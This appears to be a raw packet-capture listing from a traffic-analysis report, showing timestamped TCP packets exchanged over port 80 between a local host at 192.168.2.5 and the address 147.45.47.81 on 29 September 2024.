                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359209061 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359230042 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359246969 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359246969 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359276056 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359287024 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359294891 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359318018 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359329939 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359338999 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359359026 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359375000 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359380007 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359414101 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359421015 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359432936 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359455109 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359472036 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359476089 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359497070 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359515905 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359517097 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359534979 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359553099 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359560966 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359581947 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359597921 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359603882 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359622002 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359639883 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359651089 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359667063 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359678984 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359702110 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359705925 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359734058 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359793901 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359812021 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359833956 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359836102 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359853983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359872103 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359877110 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359898090 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359915972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359916925 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359940052 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359951019 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359966993 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.359987974 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360003948 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360008955 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360023975 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360049009 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360059023 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360084057 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360099077 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360100985 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360125065 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360137939 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360142946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360167980 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360178947 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360186100 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360209942 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360222101 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360227108 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360250950 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360263109 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360270023 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360292912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360304117 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360311031 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360335112 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360346079 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360354900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360377073 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360392094 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360398054 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360419989 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360435963 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360440016 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360462904 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360474110 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360481024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360507011 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360511065 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360523939 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360560894 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360785007 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360804081 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360826969 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360841990 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360850096 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360868931 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360887051 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360887051 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360912085 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360924006 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360932112 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360964060 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360965014 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.360984087 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361006975 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361018896 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361027956 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361044884 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361066103 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361068010 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361088991 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361104965 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361109972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361130953 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361145973 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361151934 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361174107 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.361191034 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.398207903 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.398262024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.398313046 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.398330927 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.398380995 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.398396015 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.398427010 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.398472071 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.398473024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.398519993 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.398561954 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.398561954 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.410902977 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.410975933 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.410984993 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411039114 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411092043 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411117077 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411233902 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411279917 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411283970 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411328077 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411372900 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411407948 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411468029 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411514044 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411518097 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411576033 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411617994 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411623955 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411664009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411715984 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411731958 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411775112 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411818027 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411818027 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411868095 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411909103 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411915064 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.411969900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412015915 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412019014 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412075996 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412122011 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412122011 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412183046 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412230015 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412230015 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412271976 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412316084 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412316084 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412363052 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412406921 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412410021 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412453890 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412497997 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412499905 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412560940 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412606001 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412607908 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412652969 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412703037 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412715912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412763119 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412808895 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412811041 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412853956 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412894964 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412900925 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412940025 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412985086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.412986040 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413027048 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413072109 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413073063 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413119078 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413163900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413168907 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413208961 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413254976 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413269997 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413315058 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413358927 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413366079 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413404942 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413450003 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413451910 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413501024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413542032 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413547039 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413587093 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413633108 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413634062 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413676023 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413722992 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413722992 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413767099 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413811922 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413815022 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413856030 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413898945 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413903952 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413944006 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413985014 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.413989067 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414031982 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414074898 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414077997 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414120913 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414165020 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414165974 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414206982 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414252043 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414258003 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414298058 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414338112 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414344072 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414383888 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414427996 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414429903 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414472103 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414516926 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414518118 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414561987 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414607048 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414608955 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414654016 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414694071 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414697886 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414741039 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414787054 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414787054 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414828062 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414871931 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414875031 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414918900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414963961 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.414964914 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415013075 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415055990 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415059090 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415105104 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415148973 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415149927 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415196896 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415241957 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415241957 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415288925 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415333033 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415333986 CEST8049706147.45.47.81192.168.2.5
